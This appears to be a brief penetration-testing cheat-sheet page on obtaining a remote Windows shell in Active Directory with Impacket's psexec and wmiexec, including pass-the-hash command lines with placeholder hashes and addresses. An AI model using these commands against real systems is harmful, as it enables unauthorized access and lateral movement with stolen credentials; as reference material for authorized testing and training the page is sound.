Active Directory

impacket-psexec username:password@<target-ip>
# Pass the Hashes
impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1

Impacket WmiExec

WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host.

impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hashes
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Login Windows Shell

Impacket PsExec

Impacket WmiExec

ON THIS PAGE